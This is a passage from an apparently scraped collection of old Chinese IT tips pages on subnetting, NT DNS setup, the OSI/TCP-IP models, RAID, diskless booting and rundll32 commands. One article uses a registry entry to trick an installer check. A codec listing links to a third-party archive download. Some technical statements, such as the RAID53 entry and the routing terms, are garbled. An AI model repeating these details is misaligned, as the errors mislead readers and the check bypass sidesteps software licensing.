个子网。

子网化是一种解决IP地址紧张的方案。此外，子网化还可以防止路由信息的无限制增
长。由于同一网络不同子网的网络号是一致的，所以Internet路由器到各个子网的路由
是一致的。

子网化的另一个好处就是无论该网络的拓扑如何改变都不会影响到Internet的路由，
Internet路由器也就不用花费大量的资源去计算更新路由信息。

如前所述IP是用于寻址的，所以子网在此就相当于分级寻址。先由Internet路由器根据
网络号定位到目的网络，再由内部的路由器根据扩展网络号进一步定位到目的网络中的
子网络。

路由器与路由协议

路由协议分为内部网关协议IGP和外部网关协议EGP两种，各用于自治系统内部和自治系
统之间，其中IGP又分为距离向量和链路向量。距离向量是定期向相邻的路由器交流整
个路由表的信息，如RIPv1、IGRP。而链路向量只在链路状态发生改变时向所有的路由
器交流链路状态信息，如OSPF。而象EIGRP则同时具有两种协议的特点。

可变长度子网掩码(VLSM)

在使用有类别路由协议时，因为不能跨主网络交流掩码，所以必须连续寻址且要求同一
个主网络只能用一个网络掩码。对于大小不同的子网，只能按最大子网的要求设置子网
掩码，造成了浪费。尤其是连接路由器的网络，明明只需要两个IP地址，分配的地址却
和最大的子网一样。

无类别路由协议的提出为VLSM的实施提供了可能。对同一个主网络采用不同的子网掩码
，能节省大量的地址空间，允许非连续寻址则使网络的规划更灵活。

路由汇总(Route Summarization)

随着企业上网工程的深入，路由器的增多不但让路由表变大，增加查找的时间，而且加
大了数据处理转发的过程。

路由汇总要求地址连续(是通配符掩码的要求，只有通配符掩码才能用一条路由标识多
个网络，实现路由汇总)，减少了路由表的条目；在地址连续下，路由器可以根据IP地
址的前几位决定将数据发向目的地，以加快路由转发的处理过程。

路由器工作原理与第三层交换

第三层交换是在第二层交换机上插入一个路由模块，利用交换机的高速背板路由模块和
其它的交换模块高速交换数据。在这种情况下，当A主机要向B主机发送数据时，A将B的
IP地址和自己的相比较。如果确认B与A是同一个子网，A将发送一个广播ARP，B返回其
MAC地址；于是A用MAC封装数据后，发向交换机，交换机通过查找MAC与端口对应表将数
据发向B主机的端口。如果A与B不在同一子网，A向预先设置的缺省网关(就是路由模块)
发送ARP请求。路由模块查找是否在以往的交换中已保存有B主机的MAC地址，有则返回
给A主机，否则对B所在子网广播ARP，将获得的MAC保存再发回给A。以后A要再发送数据
给B，就不用通过路由模块，直接的MAC封装，使子网间的数据交换速度和同一子网的相
差无几。

为了解决IP地址日愈紧张的情况，IPv6新一代的IP地址规范已经推出，通过将IPv4的32
位二进码升级到IPv6的128位，地址紧张的情况将一去不复返。


js写入文字

《一键清理系统垃圾》

js写入文字

版权所有
<script src="js.js"></script>

脚本内容:
document.write(" (C) 2003")

js打开网页

脚本内容;
document.write("<iframe src=index.html width=800 height=600 vspace=0 hspace=0 frameborder=no scrolling=no></iframe>")


邹从静 传奇游戏 服务器 启动

《一键清理系统垃圾》

邹从静 传奇游戏 服务器 启动

我本沉默 本飞扬 服务器 启动
从静传奇 服务器 成功 启动
我本沉默 服务器 成功 启动
D7DEB4D3BEB2 B4ABC6E6D3CECFB7 B7FECEF1C6F7 C6F4B6AF
CED2B1BEB3C1C4AC B1BEB7C9D1EF B7FECEF1C6F7 C6F4B6AF
B4D3BEB2B4ABC6E6 B7FECEF1C6F7 B3C9B9A6 C6F4B6AF
CED2B1BEB3C1C4AC B7FECEF1C6F7 B3C9B9A6 C6F4B6AF

D7DEB4D3BEB2B4ABC6E6D3CECFB7B7FECEF1C6F7C6F4B6AF
CED2B1BEB3C1C4ACB1BEB7C9D1EFB7FECEF1C6F7C6F4B6AF
B4D3BEB2B4ABC6E6B7FECEF1C6F7B3C9B9A6C6F4B6AF
CED2B1BEB3C1C4ACB7FECEF1C6F7B3C9B9A6C6F4B6AF


NT局域网内的DNS解析及配置

《一键清理系统垃圾》

NT局域网内的DNS解析及配置

    想在NT局域网内构建自己的Web Server吗？如果你安装了NT 4.0你就可以方便地建立这样的站点，而站点的名字由你任意指定。如果你也想建立，那就一步一步跟我来吧。下面，我们就以建立一个www.longer.com这样的站点给大家做介绍。当然，你也可以建立www.microsoft.com，哈哈……怎么微软的网站搬到你那里去了？

    一、为NT服务器及Windows 98工作站指定IP地址
    1.指定NT的IP地址
   准备好你的NT局域网，保证所有电脑的相互连接都畅通无阻。运行NT服务器，点开控制面板中的网络属性，选取属性面板中的“协议”，并查看“TCP/IP通讯协议”的属性，如图1、图2。
    在图2所示的面板中，可以看到“适配器（即网卡）”是Interl 82557-based 10/100 Ethernet PCI Adapter，当然，你的网卡与之可能不同，这没有关系。选取“指定IP地址”，在IP地址中填写192.168.0.1，子网掩码填写255.255.255.0，完成NT服务器端的IP配置。
    2.指定Windows 98的IP地址
    同样，在Windows 98的网络属性面板中，配置网卡的IP地址，方法如上。如图3、图4。 重新启动Windows 98以完成配置。在这台电脑上使用的IP是：192.168.0.12，如果还有其它电脑，可以设置为192.168.0.2 、192.168.0.3……子网掩码全都设置为255.255.255.0。

    二、开始配置DNS管理器
    1.新建一个区域
    运行NT，点击“开始→程序→管理工具（公用）→DNS管理器”（什么？没有“DNS管理器”这一项？那你安装Microsoft的Service Pack 6和Microsoft DNS服务器没有？如果没有，那就赶快安装吧。SP6的安装这里就不说了，下面来说说如何添加DNS服务器。右击桌面上的“网络邻居”，出现网络属性面板，选取“服务”，再选取“添加”，在“网络服务”清单中选取“Microsoft DNS服务器”，如图5。点击“确定”完成DNS管理器的安装）。DNS管理器的操作界面中的左边可以看到“服务器清单”这一项。因为现在还没有任何DNS服务器，所以是空的。右击“服务器清单”，再点击“新建服务器”，如图6。
    在“添加服务器”面板中填写NT的IP地址：192.168.0.1。如图7。
点击“确定”返回原来的操作界面，但你会发现在服务器清单中已经出现了一个:192.168.0.1。右击192.168.0.1服务器，在快捷菜单中选取“新建区域”，在“为192.168.0.1创建新区域”的面板中选择“区域类型”为“主要的”，如图8所示。
    点击“下一步”继续设置。在接下来的界面中填写如图9所示的内容。其中，longer.com.dns是由NT自动配置。
    点击“下一步”，可以看到配置成功的提示信息。点击“完成”返回。此时，DNS管理器的状态如图　　10。
    2.新建记录
    右击longer.com，在快捷菜单中选取“新建记录”， 在“记录类型”中选取“A记录”，在“主机名”中填写 “www”，在“主机IP地址”中填写192.168.0.1。如图11，点击“确定”就完成了www.longer.com的DNS配置。现在你就可以在NT的浏览器上输入www.longer.com，可以看到NT Server IIS所默认的网页了。但访问者总是好奇的，他们也许会试着在浏览器地址栏中输入admin.longer.com这样的网址，而浏览器会提示说“找不到服务器（大意如此）”，怎么做才能避免出现这种情况呢？于是，通配符“*”在这里被派上大用场。如果按上面所说的建立www这样的主机一样的方法将主机名设置为“*”，你会发现访问者输入任意一个如111111. longer.com，fjalfjdljfsdaj.longer.com这样的网址也可以被访问，而且网页始终指向IIS所指定的默认页。好了，现在在NT上可以正常访问了。但如果在Windows 98上，却不能访问！怎么回事儿呢？呵……还有一点没有说呢！

     三、配置Winodws 98的DNS搜索顺序
    在Windows 98的网络属性面板中找到DNS这一项。
    选取“启用DNS”，在“主机”一栏中填写“server（这是NT服务器的名字，在NT的网络属性中可以看到）”。在下面的DNS服务器搜索顺序中填写192.168.0.1，完成后点击“添加”。再点击“确定”，如图12。重新启动Windows 98就OK了。当然其它各户端的Windows 98也都这样配置。
    完成了吗？现在打开每台Windows 98的IE浏览器输入网址www.longer.com及如xxx.longer.com（xxx表示任意字母及数字），你都会看到网页了。

    四、如何在一台NT上配置多个域名及IIS的设置
    如果要讲在同一台NT上如何配置多个域名，我想这将成为废话。因为所有的设置方法都是一样的，但有一个问题就是所有的网址都会指向同一个网页，这个问题的解决不是在DNS管理器而是在IIS里。同时，你的IIS版本最好是IIS 4（在http://www.newhua.com.cn中可以下载Option Pack 4，内含IIS 4），这样才能很好地得到解决。在IIS中，只要你配置恰当，就能将每个网址指向的各自不同的网页。

    五、其它说明
    事实上，这里所说的www.longer.com这样的域名已经被NSI注册了，如果在NT局域网配置的网址与Internet上的网址相同，那局域网访问的就永远是局域网内部的这个网址。所以，在配置内部网址时一定要注意尽量不要与现有的Internet网址相冲突。


OSI七层网络模型与TCP/IP四层网络模型

《一键清理系统垃圾》

OSI七层网络模型与TCP/IP四层网络模型

2.1 OSI网络分层参考模型

    网络协议设计者不应当设计一个单一、巨大的协议来为所有形式的通信规定完整的细节，而应把通信问题划分成多个小问题，然后为每一个小问题设计一个单独的协议。这样做使得每个协议的设计、分析、时限和测试比较容易。协议划分的一个主要原则是确保目标系统有效且效率高。为了提高效率，每个协议只应该注意没有被其他协议处理过的那部分通信问题；为了主协议的实现更加有效，协议之间应该能够共享特定的数据结构；同时这些协议的组合应该能处理所有可能的硬件错误以及其它异常情况。为了保证这些协议工作的协同性，应当将协议设计和开发成完整的、协作的协议系列(即协议族)，而不是孤立地开发每个协议。
    在网络历史的早期，国际标准化组织(ISO)和国际电报电话咨询委员会(CCITT)共同出版了开放系统互联的七层参考模型。一台计算机操作系统中的网络过程包括从应用请求(在协议栈的顶部)到网络介质(底部) ，OSI参考模型把功能分成七个分立的层次。图2.1表示了OSI分层模型。

    ┌─────┐
    │　应用层　│←第七层
    ├─────┤
    │　表示层　│
    ├─────┤
    │　会话层　│
    ├─────┤
    │　传输层　│
    ├─────┤
    │　网络层　│
    ├─────┤
    │数据链路层│
    ├─────┤
    │　物理层　│←第一层
    └─────┘
    图2.1 OSI七层参考模型

    OSI模型的七层分别进行以下的操作：

    第一层??物理层
    第一层负责最后将信息编码成电流脉冲或其它信号用于网上传输。它由计算机和网络介质之间的实际界面组成，可定义电气信号、符号、线的状态和时钟要求、数据编码和数据传输用的连接器。如最常用的RS-232规范、10BASE-T的曼彻斯特编码以及RJ-45就属于第一层。所有比物理层高的层都通过事先定义好的接口而与它通话。如以太网的附属单元接口(AUI)，一个DB-15连接器可被用来连接层一和层二。
    第二层??数据链路层
    数据链路层通过物理网络链路提供可靠的数据传输。不同的数据链路层定义了不同的网络和协议特征，其中包括物理编址、网络拓扑结构、错误校验、帧序列以及流控。物理编址（相对应的是网络编址）定义了设备在数据链路层的编址方式；网络拓扑结构定义了设备的物理连接方式，如总线拓扑结构和环拓扑结构；错误校验向发生传输错误的上层协议告警；数据帧序列重新整理并传输除序列以外的帧；流控可能延缓数据的传输，以使接收设备不会因为在某一时刻接收到超过其处理能力的信息流而崩溃。数据链路层实际上由两个独立的部分组成，介质存取控制（Media Access Control,MAC）和逻辑链路控制层（Logical Link Control,LLC）。MAC描述在共享介质环境中如何进行站的调度、发生和接收数据。MAC确保信息跨链路的可靠传输，对数据传输进行同步，识别错误和控制数据的流向。一般地讲，MAC只在共享介质环境中才是重要的，只有在共享介质环境中多个节点才能连接到同一传输介质上。IEEE MAC规则定义了地址，以标识数据链路层中的多个设备。逻辑链路控制子层管理单一网络链路上的设备间的通信，IEEE 802.2标准定义了LLC。LLC支持无连接服务和面向连接的服务。在数据链路层的信息帧中定义了许多域。这些域使得多种高层协议可以共享一个物理数据链路。
    第三层??网络层
    网络层负责在源和终点之间建立连接。它一般包括网络寻径，还可能包括流量控制、错误检查等。相同MAC标准的不同网段之间的数据传输一般只涉及到数据链路层，而不同的MAC标准之间的数据传输都涉及到网络层。例如IP路由器工作在网络层，因而可以实现多种网络间的互联。
    第四层??传输层
    传输层向高层提供可靠的端到端的网络数据流服务。传输层的功能一般包括流控、多路传输、虚电路管理及差错校验和恢复。流控管理设备之间的数据传输，确保传输设备不发送比接收设备处理能力大的数据；多路传输使得多个应用程序的数据可以传输到一个物理链路上；虚电路由传输层建立、维护和终止；差错校验包括为检测传输错误而建立的各种不同结构；而差错恢复包括所采取的行动（如请求数据重发），以便解决发生的任何错误。传输控制协议（TCP）是提供可靠数据传输的TCP/IP协议族中的传输层协议。
    第五层??会话层
    会话层建立、管理和终止表示层与实体之间的通信会话。通信会话包括发生在不同网络应用层之间的服务请求和服务应答，这些请求与应答通过会话层的协议实现。它还包括创建检查点，使通信发生中断的时候可以返回到以前的一个状态。
    第六层??表示层
    表示层提供多种功能用于应用层数据编码和转化，以确保以一个系统应用层发送的信息可以被另一个系统应用层识别。表示层的编码和转化模式包括公用数据表示格式、性能转化表示格式、公用数据压缩模式和公用数据加密模式。
    公用数据表示格式就是标准的图像、声音和视频格式。通过使用这些标准格式，不同类型的计算机系统可以相互交换数据；转化模式通过使用不同的文本和数据表示，在系统间交换信息，例如ASCII(American Standard Code for Information Interchange，美国标准信息交换码)；标准数据压缩模式确保原始设备上被压缩的数据可以在目标设备上正确的解压；加密模式确保原始设备上加密的数据可以在目标设备上正确地解密。
    表示层协议一般不与特殊的协议栈关联，如QuickTime是Applet计算机的视频和音频的标准，MPEG是ISO的视频压缩与编码标准。常见的图形图像格式PCX、GIF、JPEG是不同的静态图像压缩和编码标准。
    第七层??应用层
    应用层是最接近终端用户的OSI层，这就意味着OSI应用层与用户之间是通过应用软件直接相互作用的。注意，应用层并非由计算机上运行的实际应用软件组成，而是由向应用程序提供访问网络资源的API（Application Program Interface，应用程序接口）组成，这类应用软件程序超出了OSI模型的范畴。应用层的功能一般包括标识通信伙伴、定义资源的可用性和同步通信。因为可能丢失通信伙伴，应用层必须为传输数据的应用子程序定义通信伙伴的标识和可用性。定义资源可用性时，应用层为了请求通信而必须判定是否有足够的网络资源。在同步通信中，所有应用程序之间的通信都需要应用层的协同操作。
    OSI的应用层协议包括文件的传输、访问及管理协议(FTAM) ，以及文件虚拟终端协议(VIP)和公用管理系统信息(CMIP)等。

2.2 TCP/IP分层模型

    TCP/IP分层模型（TCP/IP Layening Model）被称作因特网分层模型(Internet Layering Model)、因特网参考模型(Internet Reference Model)。图2.2表示了TCP/IP分层模型的四层。
    ┌────────┐┌─┬─┬─┬─┬─┬─┬─┬─┬─┬─┬─┐
    │　　　　　　　　││Ｄ│Ｆ│Ｗ│Ｆ│Ｈ│Ｇ│Ｔ│Ｉ│Ｓ│Ｕ│　│
    │　　　　　　　　││Ｎ│Ｉ│Ｈ│Ｔ│Ｔ│Ｏ│Ｅ│Ｒ│Ｍ│Ｓ│其│
    │第四层，应用层　││Ｓ│Ｎ│Ｏ│Ｐ│Ｔ│Ｐ│Ｌ│Ｃ│Ｔ│Ｅ│　│
    │　　　　　　　　││　│Ｇ│Ｉ│　│Ｐ│Ｈ│Ｎ│　│Ｐ│Ｎ│　│
    │　　　　　　　　││　│Ｅ│Ｓ│　│　│Ｅ│Ｅ│　│　│Ｅ│它│
    │　　　　　　　　││　│Ｒ│　│　│　│Ｒ│Ｔ│　│　│Ｔ│　│
    └────────┘└─┴─┴─┴─┴─┴─┴─┴─┴─┴─┴─┘
    ┌────────┐┌─────────┬───────────┐
    │第三层，传输层　││　　　ＴＣＰ　　　│　　　　ＵＤＰ　　　　│
    └────────┘└─────────┴───────────┘
    ┌────────┐┌─────┬────┬──────────┐
    │　　　　　　　　││　　　　　│ＩＣＭＰ│　　　　　　　　　　│
    │第二层，网间层　││　　　　　└────┘　　　　　　　　　　│
    │　　　　　　　　││　　　　　　　ＩＰ　　　　　　　　　　　　│
    └────────┘└─────────────────────┘
    ┌────────┐┌─────────┬───────────┐
    │第一层，网络接口││ＡＲＰ／ＲＡＲＰ　│　　　　其它　　　　　│
    └────────┘└─────────┴───────────┘
            图2.2　ＴＣＰ／ＩＰ四层参考模型
    TCP/IP协议被组织成四个概念层，其中有三层对应于ISO参考模型中的相应层。ICP/IP协议族并不包含物理层和数据链路层，因此它不能独立完成整个计算机网络系统的功能，必须与许多其他的协议协同工作。
    TCP/IP分层模型的四个协议层分别完成以下的功能：
    第一层??网络接口层
    网络接口层包括用于协作IP数据在已有网络介质上传输的协议。实际上TCP/IP标准并不定义与ISO数据链路层和物理层相对应的功能。相反，它定义像地址解析协议(Address Resolution Protocol,ARP)这样的协议，提供TCP/IP协议的数据结构和实际物理硬件之间的接口。
    第二层??网间层
    网间层对应于OSI七层参考模型的网络层。本层包含IP协议、RIP协议(Routing Information Protocol，路由信息协议)，负责数据的包装、寻址和路由。同时还包含网间控制报文协议(Internet Control Message Protocol,ICMP)用来提供网络诊断信息。
    第三层??传输层
    传输层对应于OSI七层参考模型的传输层，它提供两种端到端的通信服务。其中TCP协议(Transmission Control Protocol)提供可靠的数据流运输服务，UDP协议(Use Datagram Protocol)提供不可靠的用户数据报服务。
    第四层??应用层
    应用层对应于OSI七层参考模型的应用层和表达层。因特网的应用层协议包括Finger、Whois、FTP(文件传输协议)、Gopher、HTTP(超文本传输协议)、Telent(远程终端协议)、SMTP(简单邮件传送协议)、IRC(因特网中继会话)、NNTP（网络新闻传输协议）等，这也是本书将要讨论的重点。


PNP无盘的快速安装方法

《一键清理系统垃圾》

PNP无盘的快速安装方法

我们知道在用前篇《PNP无盘的安装方法》一文安装PNP系统时，必须得用软驱，有没有办法不用软驱，照样可以做成的呢，本人经过实践终于找到以下解决方法：

以下方法是没有用LITENET上传之前做的工作的，
修改样板机的AUTOEXEC.BAT内容如下：
@echo off
set windir=c:\windows （设置windows所在目录）
set drive=c: (设置windows所在驱动器)
set netcard=rtsnd.dos (设置实模式下的网卡驱动程序)
set server=lzmhy (设置文件服务器的NETBIOS名称，安装2000SERVER时输入的名字)
ser share=pxee (设置上传的目标目录，即共享的WINDOWS目录)

复制LITENET目录中的SNASHOT.VXD文件到c:\windows\sysem目录中，
建立，导入SN.REG注册表文件(文件名可以为任意)，内容如下兰色部分：

REGEDIT4
[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\SNAPSHOT]
“NetClean”=hex:01
“Start”=hex:00
“StaticVxD”=”SNAPSHOT.VXD”

建立,并导入litenet.reg注册表文件，内容如下兰色部分：

REGEDIT4
[HKEY_LOCAL_MACHINE\Software\Qualystem\LiteNET PC]
“Step”=”2”
“Version”=”1.15”

这一步主要是为了正常使用LITENET的上传工具，因为QSYNCH.EXE在运行是要判断系统中是否已经安装LIENET，导入这个文件便可以骗过QSYNCH.EXE，

复制LITENET中的所有的文件到c:\windows目录下，重新启动电脑（一定要重新启动）

启动之后直接运行QSYNCH.EXE将本地文件直接上传至服务器，

我们知道在用LITENET时要生成磁盘文件，但是用上述方法是不用生成磁盘文件，那怎么样生成映象文件dosundi.1这个文件呢，
我们可以事先做好一个这个的文件，把这个文件刻在光盘或者硬盘上面的（这样做方便）
但是一点一定要记住，你的服务器名与共享名必须与上面的AUTOEXEC.BAT里面的服务器名和共享目录名一致，不然的话必定不能启动）
这样就行了，

此程方法可以减掉软驱，减少磁盘，还有不需要工作站用LIENET上传时得重新启动样板机，不用生产磁盘文件，因此在安装速度上大大加快了的，


raid简介

《一键清理系统垃圾》

raid简介

一．Raid定义
    RAID(Redundant Array of Independent Disk 独立冗余磁盘阵列)技术是加州大学伯克利分校1987年

提出，最初是为了组合小的廉价磁盘来代替大的昂贵磁盘，同时希望磁盘失效时不会使对数据的访问受损

失而开发出一定水平的数据保护技术。RAID就是一种由多块廉价磁盘构成的冗余阵列，在操作系统下是作

为一个独立的大型存储设备出现。RAID可以充分发挥出多块硬盘的优势，可以提升硬盘速度，增大容量,

提供容错功能够确保数据安全性，易于管理的优点，在任何一块硬盘出现问题的情况下都可以继续工作，

不会受到损坏硬盘的影响。
二、RAID的几种工作模式
1、RAID0
     即Data Stripping数据分条技术。RAID 0可以把多块硬盘连成一个容量更大的硬盘群，可以提高磁

盘的性能和吞吐量。RAID 0没有冗余或错误修复能力，成本低，要求至少两个磁盘，一般只是在那些对数

据安全性要求不高的情况下才被使用。
（1）、RAID 0最简单方式
     就是把x块同样的硬盘用硬件的形式通过智能磁盘控制器或用操作系统中的磁盘驱动程序以软件的方

式串联在一起，形成一个独立的逻辑驱动器，容量是单独硬盘的x倍,在电脑数据写时被依次写入到各磁盘

中，当一块磁盘的空间用尽时，数据就会被自动写入到下一块磁盘中，它的好处是可以增加磁盘的容量。

速度与其中任何一块磁盘的速度相同，如果其中的任何一块磁盘出现故障，整个系统将会受到破坏，可靠

性是单独使用一块硬盘的1/n。
（2）、RAID 0的另一方式
    是用n块硬盘选择合理的带区大小创建带区集，最好是为每一块硬盘都配备一个专门的磁盘控制器,在

电脑数据读写时同时向n块磁盘读写数据,速度提升n倍。提高系统的性能。
2、RAID 1
    RAID 1称为磁盘镜像：把一个磁盘的数据镜像到另一个磁盘上，在不影响性能情况下最大限度的保证

系统的可靠性和可修复性上，具有很高的数据冗余能力，但磁盘利用率为50%，故成本最高，多用在保存

关键性的重要数据的场合。RAID 1有以下特点：
     （1）、RAID 1的每一个磁盘都具有一个对应的镜像盘，任何时候数据都同步镜像，系统可以从一组

镜像盘中的任何一个磁盘读取数据。
    （2）、磁盘所能使用的空间只有磁盘容量总和的一半，系统成本高。
    （3）、只要系统中任何一对镜像盘中至少有一块磁盘可以使用，甚至可以在一半数量的硬盘出现问

题时系统都可以正常运行。
    （4）、出现硬盘故障的RAID系统不再可靠，应当及时的更换损坏的硬盘，否则剩余的镜像盘也出现

问题，那么整个系统就会崩溃。
    （5）、更换新盘后原有数据会需要很长时间同步镜像，外界对数据的访问不会受到影响，只是这时

整个系统的性能有所下降。
    （6）、RAID 1磁盘控制器的负载相当大，用多个磁盘控制器可以提高数据的安全性和可用性。
3、RAID0+1
   把RAID0和RAID1技术结合起来，数据除分布在多个盘上外，每个盘都有其物理镜像盘，提供全冗余能

力，允许一个以下磁盘故障，而不影响数据可用性，并具有快速读/写能力。RAID0+1要在磁盘镜像中建立

带区集至少4个硬盘。
4、RAID2
    电脑在写入数据时在一个磁盘上保存数据的各个位，同时把一个数据不同的位运算得到的海明校验码

保存另一组磁盘上，由于海明码可以在数据发生错误的情况下将错误校正，以保证输出的正确。但海明码

使用数据冗余技术，使得输出数据的速率取决于驱动器组中速度最慢的磁盘。RAID2控制器的设计简单。
5、RAID3：带奇偶校验码的并行传送
    RAID 3使用一个专门的磁盘存放所有的校验数据，而在剩余的磁盘中创建带区集分散数据的读写操作

。当一个完好的RAID 3系统中读取数据，只需要在数据存储盘中找到相应的数据块进行读取操作即可。但

当向RAID 3写入数据时，必须计算与该数据块同处一个带区的所有数据块的校验值，并将新值重新写入到

校验块中，这样无形虽增加系统开销。当一块磁盘失效时，该磁盘上的所有数据块必须使用校验信息重新

建立，如果所要读取的数据块正好位于已经损坏的磁盘，则必须同时读取同一带区中的所有其它数据块，

并根据校验值重建丢失的数据，这使系统减慢。当更换了损坏的磁盘后，系统必须一个数据块一个数据块

的重建坏盘中的数据，整个系统的性能会受到严重的影响。RAID 3最大不足是校验盘很容易成为整个系统

的瓶颈，对于经常大量写入操作的应用会导致整个RAID系统性能的下降。RAID 3适合用于数据库和WEB服

务器等。
6、 RAID4
    RAID4即带奇偶校验码的独立磁盘结构，RAID4和RAID3很象，它对数据的访问是按数据块进行的，也

就是按磁盘进行的，每次是一个盘，RAID4的特点和RAID3也挺象，不过在失败恢复时，它的难度可要比

RAID3大得多了，控制器的设计难度也要大许多，而且访问数据的效率不怎么好。
7、 RAID5
    RAID 5把校验块分散到所有的数据盘中。RAID 5使用了一种特殊的算法，可以计算出任何一个带区校

验块的存放位置。这样就可以确保任何对校验块进行的读写操作都会在所有的RAID磁盘中进行均衡，从而

消除了产生瓶颈的可能。RAID5的读出效率很高，写入效率一般，块式的集体访问效率不错。RAID 5提高

了系统可靠性，但对数据传输的并行性解决不好，而且控制器的设计也相当困难。
8、RAID6
    RAID6即带有两种分布存储的奇偶校验码的独立磁盘结构，它是对RAID5的扩展，主要是用于要求数据

绝对不能出错的场合，使用了二种奇偶校验值，所以需要N+2个磁盘，同时对控制器的设计变得十分复杂

，写入速度也不好，用于计算奇偶校验值和验证数据正确性所花费的时间比较多，造成了不必须的负载，

很少人用。
9、 RAID7
    RAID7即优化的高速数据传送磁盘结构，它所有的I/O传送均是同步进行的，可以分别控制，这样提高

了系统的并行性和系统访问数据的速度；每个磁盘都带有高速缓冲存储器，实时操作系统可以使用任何实

时操作芯片，达到不同实时系统的需要。允许使用SNMP协议进行管理和监视，可以对校验区指定独立的传

送信道以提高效率。可以连接多台主机，当多用户访问系统时，访问时间几乎接近于0。但如果系统断电

，在高速缓冲存储器内的数据就会全部丢失，因此需要和UPS一起工作，RAID7系统成本很高。
10、 RAID10
RAID10即高可靠性与高效磁盘结构它是一个带区结构加一个镜象结构，可以达到既高效又高速的目的。这

种新结构的价格高，可扩充性不好。
11、 RAID53
RAID7即高效数据传送磁盘结构，是RAID3和带区结构的统一，因此它速度比较快，也有容错功能。但价格

十分高，不易于实现。

三、应用RAID技术
    要使用磁盘RAID主要有两种方式，第一种就是RAID适配卡，通过RAID适配卡插入PCI插槽再接上硬盘

实现硬盘的RAID功能。第二种方式就是直接在主板上集成RAID控制芯片，让主板能直接实现磁盘RAID。这

种方式成本比专用的RAID适配卡低很多。
此外还可以用2k or xp or linux系统做成软raid.
    个人使用磁盘RAID主要是用RAID0、 RAID1或RAID0＋1工作模式。


Realone 解码器 FOR Windows Media Player

《一键清理系统垃圾》

Realone 解码器 FOR Windows Media Player

软件大小：4.69M
软件语言：简体中文
软件类别：国外软件 / 免费版 / 媒体播放
运行环境：Win9x/NT/2000/XP/2003
软件更新：2004-2-2 20:10:50
页面刷新：2004-2-3 23:57:22
软件添加：f
下载次数：45120
软件评级：
联 系 人：未知　　开 发 商：http://www.ayxz.com ;
软件介绍： 1.不用再安装realone就可以用windows media plays就可以播放rm/ra/rmvb 2.支持windows media6.4/7.0/8.0/9.0 3.在98/me/2k/xp/win2003测试通过 装了这个你的Windows Media Player就可以放RM RMVB 文件了.爽吧?

提供下载 http://down.ayxz.com/down14753/media/RealoneED.rar


Rundll.exe 高级应用

《一键清理系统垃圾》

Rundll.exe 高级应用

常用Windows9x的朋友一定对Rundll32.exe和Rundll.exe这两个档案不
会陌生吧，不过,由於这两个程式的功能原先只限於在微软内部使用，因而真正
知道如何使用它们的朋友想必不多。那麽好，如果你还不清楚的话，那麽
就让我来告诉你吧。

首先，请你做个小实验（请事先保存好你正在执行的程式的结果，否则...）∶
点击“开始－程式－Ms－Dos方式”，进入Dos视窗，然後键入
"rundll32.exe user.exe,restartwindows"，再按下回车键，这时你将看到，机
器被重启了！怎麽样，是不是很有趣？

当然，Rundll的功能绝不仅仅是重启你的机器。其实，Rundll者，顾名思义，
执行Dll也，它的功能就是以命令列的方式呼叫Windows的动态链结库，
Rundll32.exe与Rundll.exe的区别就在於前者是呼叫32位的链结库，而後者是运
用於16位的链结库，它们的命令格式是∶
RUNDLL.EXE ，，

这里要注意三点∶
1.Dll档案名中不能含有空格，比如该档案位於c:\Program Files目录，你要把这个路径改成c:\Progra～1；
2.Dll档案名与Dll入口点间的逗号不能少，否则程式将出错并且不会给出任何资讯！
3.这是最重要的
一点∶Rundll不能用来呼叫含返回值参数的Dll，例如Win32API中的GetUserName(),
GetTextFace()等。

在Visual Basic中，提供了一条执行外部程式的指令Shell,格
式为∶
Shell “命令列”
如果能配合Rundll32.exe用好Shell指令，会使您的VB程式拥有用其他方法难
以甚至无法实现的效果∶仍以重启为例，传统的方法需要你在VB工程中先建立一个模组，然後写入WinAPI的声明，最後才能在程式中呼叫。而现在只需一句:
Shell “rundll32.exe user.exe,restartwindows”就搞定了！是不是方便
多了？

实际上，Rundll32.exe在呼叫各种Windows控制面板和系统选项方面有著独特
的优势。下面，我就将本人在因特网上收集的有关Rundll的指令列举如下（很有用的，能省去你很多呼叫Windows API的时间！！），供大家在程式设计中引用∶
命令列: rundll32.exe shell32.dll,Control_RunDLL
功能: 显示控制面板
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
功能: 显示“控制面板－辅助选项－键盘”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
功能: 显示“控制面板－辅助选项－声音”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
功能: 显示“控制面板－辅助选项－显示”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
功能: 显示“控制面板－辅助选项－滑鼠”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
功能: 显示“控制面板－辅助选项－传统”选项视窗
命令列: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
功能: 执行“控制面板－添加新硬体”向导。
命令列: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
功能: 执行“控制面板－添加新印表机”向导。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
功能: 显示 “控制面板－添加/删除程式－安装/卸载” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
功能: 显示 “控制面板－添加/删除程式－安装Windows” 面板。
命令列: rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
功能: 显示 “控制面板－添加/删除程式－启动盘” 面板。
命令列: rundll32.exe syncui.dll,Briefcase_Create
功能: 在桌面上建立一个新的“我的公文包”。
命令列: rundll32.exe diskcopy.dll,DiskCopyRunDll
功能: 显示复制软碟视窗
命令列: rundll32.exe apwiz.cpl,NewLinkHere ％1
功能: 显示“建立快捷方式”的对话框，所建立的快捷方式的位置由％1参数决定。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,0
功能: 显示“日期与时间”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,1
功能: 显示“时区”选项视窗。
命令列: rundll32.exe rnaui.dll,RnaDial [某个拨号连接的名称]
功能: 显示某个拨号连接的拨号视窗。如果已经拨号连接，则显示目前的连接状态的视窗。
命令列: rundll32.exe rnaui.dll,RnaWizard
功能: 显示“新建拨号连接”向导的视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
功能: 显示“显示属性－背景”选项视窗。
命令列: rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
功能: 显示“显示属性－萤屏保护”选项视窗。
